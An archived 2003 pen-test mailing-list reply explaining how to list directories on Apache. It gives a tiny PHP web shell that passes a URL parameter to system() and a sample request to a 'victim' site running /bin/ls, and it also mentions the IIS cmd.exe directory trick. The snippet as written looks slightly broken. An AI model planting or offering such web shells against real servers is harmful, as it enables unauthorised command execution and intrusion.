RE: Directory listing

• Previous message: Chris McNab: "MSRPC IFID List?"
• Maybe in reply to: John Madden: "Directory listing"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Date: Sun, 11 May 2003 11:33:24 +0200
To: "John Madden" <chiwawa999@yahoo.com>, <pen-test@securityfocus.com>

Hey
to answer your question , Yes same thing can be accomplished on any platform or any webserver
if you can inject the following script to an apache server running php , you will be able to execute any command
for example ls -la / and see the directories etc ...

Ex :

<? php
       system($arg);
?>

    after you inject this file, lets say you called it break.php do the following :

         "http://www.victim.com/break.php?arg=/bin/ls"

     you will get the directories and files etc ...

-----Original Message-----
From: John Madden [mailto:chiwawa999@yahoo.com]
Sent: Monday, May 05, 2003 8:32 PM
To: pen-test@securityfocus.com
Subject: Directory listing

Hi,

In IIS/4 or 5 you can use the cmd.exe?/c+dir to get
the directory of a machine how can the same be
accomplish on other types of web server like Apache ?

Can this be accomplished with a cgi or perl script ?

Thanks

John

__________________________________
Do you Yahoo!?
The New Yahoo! Search - Faster. Easier. Bingo.
http://search.yahoo.com

---------------------------------------------------------------------------
Did you know that you have VNC running on your network?
Your hacker does.
Plug your security holes.
Download a free 15-day trial of VAM:
http://www.securityfocus.com/StillSecure-pen-test
----------------------------------------------------------------------------

---------------------------------------------------------------------------
Did you know that you have VNC running on your network?
Your hacker does.
Plug your security holes.
Download a free 15-day trial of VAM:
http://www.securityfocus.com/StillSecure-pen-test
----------------------------------------------------------------------------

• Previous message: Chris McNab: "MSRPC IFID List?"
• Maybe in reply to: John Madden: "Directory listing"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Relevant Pages Re: Please help, directory level protection needed. ... Going back to my original post, I thought my statement about what I was ... trying to accomplish, how I had accomplished it in the past, and why I ... Please feel free to go back to my original post, and the replies of ... I don't want to debate which is better Apache or IIS, ... (microsoft.public.inetserver.iis.security) Re: Registry Change to 6 services_denied ... the account I'm using w/in A.D. ... Windows Settings> Security Settings> System Services of a group policy, ... everyone on your network and accomplish similar goals. ... any way to accomplish this with logon/logoff script. ... (microsoft.public.windows.server.scripting) Re: Script to modify NIS maps ... via a script. ... I have been trying to accomplish this via sed, Perl, ... There are numerous maps I would be looking to edit via the tool/ ... awk -f remove.awk target=foo3 datafile ... (comp.unix.shell) RE: Find computers, which are not disabled, in AD via script ... I'm not entirely clear on what you're trying to accomplish. ... Use of included script samples are subject to the terms specified at ... message are best directed to the newsgroup/thread from which they ... | X-Newsreader: Microsoft Outlook Express 6.00.3790.0 ... (microsoft.public.win2000.active_directory) Re: Reading and Writing to a Text file ... >> I am trying to write a script that will return a list ... >Be sure to let us know when you either accomplish the ... >> DIM fso ... >> For Each strMember in arrMemberOf ... (microsoft.public.windows.server.scripting)